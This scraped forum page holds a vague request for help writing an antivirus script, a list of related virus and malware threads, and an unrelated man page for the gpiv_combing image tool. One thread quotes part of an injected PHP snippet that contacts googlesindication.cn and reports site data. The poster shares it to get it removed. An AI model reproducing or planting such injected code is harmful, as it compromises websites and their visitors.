Sponsored Content
Top Forums Shell Programming and Scripting Anti-malicious files and viruses Post 302441824 by x-zer0 on Tuesday 3rd of August 2010 09:25:27 AM
Old 08-03-2010
Anti-malicious files and viruses

Hello
I ask you how to make a
Anti-malicious files and viruses

Or if one of you a small example of the work on the same place and I hope my request

I want a small patch or the process of examination Virus



Image


---------- Post updated 08-03-10 at 08:25 AM ---------- Previous update was 08-02-10 at 12:26 PM ----------

can help me
 

9 More Discussions You Might Find Interesting

1. Cybersecurity

Fed up of Viruses

I am fed up of getting viruses on my computer. They come from other computers on the network and I'm fed up with them. Can anyone reccomend some virus scanning software or something that I can use to prevent my machine from getting viruses? Thanks (3 Replies)
Discussion started by: jacx2
3 Replies

2. Cybersecurity

Viruses in downloads/webs

How secure are downloads from unix.com, linux.com, etc? Not talking about off the wall individual user sites, but sites like unix.com, download.com, tucows.com? We've been inundated at work lately from viruses, and I want to make sure that for things like work related downloads, that those kind... (5 Replies)
Discussion started by: kymberm
5 Replies

3. Windows & DOS: Issues & Discussions

Viruses sneeking through MS-DOS?

I had just recently experienced, a bad experience... Apperently, a worm got into my computer a created itself in my MS-DOS. No serious damage was done, but I did a little study on it, through my computer. The virus got thought my scan, by coding itself as an HTML file. Don't know why it did that,... (2 Replies)
Discussion started by: hdk_mkr
2 Replies

4. UNIX for Dummies Questions & Answers

Why no Viruses in Unix

Can anyone explain why generally there are no viruses in Unix. Do any of the big Anti Virus supplier produce anything for Unix platforms ? (1 Reply)
Discussion started by: jimthompson
1 Replies

5. Shell Programming and Scripting

remove malicious codes from a file

Hello, Please advise a script/command to remove the following line for a file <?php error_reporting(0); $fn = "googlesindication.cn"; $fp = fsockopen($fn, 80, $errno, $errstr, 15); if (!$fp) { } else { $query='site='.$_SERVER; $out = "GET /links.php?".$query." HTTP/1.1\r\n"; ... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies

6. Solaris

Solaris + viruses

I know that UNIX is almost untouchable but my server is slower than previous days . I found out that some users have watched porn on net , could they compromised system security . So I have 2 questions 1. Has on market any viruses for Solaris 2. How to block some internet sites under... (1 Reply)
Discussion started by: solaris_user
1 Replies

7. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies

8. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies

9. Debian

Malicious perl script

Relative newbie to Linux so please be kind and assume I've done little in the way of command line but i have been thrusted into this position. Here goes. There is a perl script on my box that is using me as a mail server. It is contacting other mail servers to the point of slowing down the box.... (20 Replies)
Discussion started by: dadprpus
20 Replies
GPIV_COMBING(1) 					      General Commands Manual						   GPIV_COMBING(1)

NAME
gpiv_combing - Combines two single-exposed images into one image file for cross-correlation. SYNOPSIS
gpiv_combing [-a | --suf_a S] [-b | --suf_b S] [-d | --dt S] [-h | --help] [-p | --print] [-s | --skip S] [-t | --type] [-u | --suf_num N] [-v | --version] [-V | --verbose] [-w | --warning] file_basename DESCRIPTION
gpiv_combing combines two images from a common image format that use lossless compressing schemes into a Portable Network Graphics image with extension .png. The resulting 'double frame' image is used for cross-correlation with gpiv_rr (or gpiv). Additional information is added to the image header, like the parameter for enabling cross correlation, separation time between the recordings of the two images and the name of this program. This program uses the IMG configuration parameters. As the input images are single-frame and will probably not contain the required X_corr parameter in its header, the IMG.X_corr setting will have to be set to 0 for the correct loading. The default settings may be overruled by the command line options, as explained below. Options -h | --help On-line help. -a | --suf_a S The filename of the first image is generated from the file_basename, the suffix S (default: _a) and from the image extension type. -b | --suf_b S The filename of the second image is generated from the file_basename, the suffix S (default: _b) and from the image extension type. -d | --dt S The time between subsequent images in milliseconds. The value will be written to the image header. If -s | --skip is used, the sepa- ration time will be adapted to the correct value. -p | --print Prints parameters to stdout. -s | --skip S Skip S numbers; the first image with number N (defined by -u | --suf_num N) will be combined with the second image N+S+1 (default: S = 0) -t | --type Type or format of the input image (default png). Supported formats are: raw binary (r), hdf5 (gpi), gif, tif, bmp and pgm. The for- mat of the output image will always be png. -u | --suf_num N If images are numbered instead of having suffixes _a and _b. N represents the first of the two numbered frames which will be com- bined with frame N + 1. The combined image will be named to file_basenameN.png. So, only odd or even numbered images will result to be loaded in gpiv_rr (or gpiv) for cross-correlation. -v | --version Print version information on standard output, then exit successfully. -V | --verbose Program behaves verbose during operation, like printing filenames, separation time. -w | --warning Checks and warns if one of the two input images already contain an image pair, i.e. the header parameter X-corr is set TRUE. The program will exit if this is the case. Besides this warning, the program will always check if the images are of equal sizes. If an input image does not contain the X-corr parameter in its header, the parameter will be read from the parameter resources. Not using this option allows one to keep the settings in the parameter resources in any state. file_basename The filename without the image extension (like .png, .tif etc) and suffix or number. Examples Suppose two single-exposed images will have to be combined for cross-correlation with names image_a.gif and image_b.gif: so the file_base- name will be "image", _a and _b are default suffixes and the image type has to be defined. The program is used following: gpiv_combing -t gif image As PNG is default image format, -t key is not needed. Two images with names turtle_slow.png and turtle_fast.png are combined with: gpiv_combing -a _slow -b _fast turtle For two numbered images img03.png and img04.png only the starting number will have to defined: gpiv_combing -u 3 img0 Two numbered images img03.png and img09.png will have to be combined by skipping 5 images in-between. If -d | --dt S is used, the correct separation time between the combined frames is calculated from S: gpiv_combing -u 3 -s 5 img0 SEE ALSO gpivtools NOTES
The program uses netpbm. AUTHOR
Gerber Van der Graaf 31 October 2006 GPIV_COMBING(1)
All times are GMT -4. The time now is 04:34 PM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy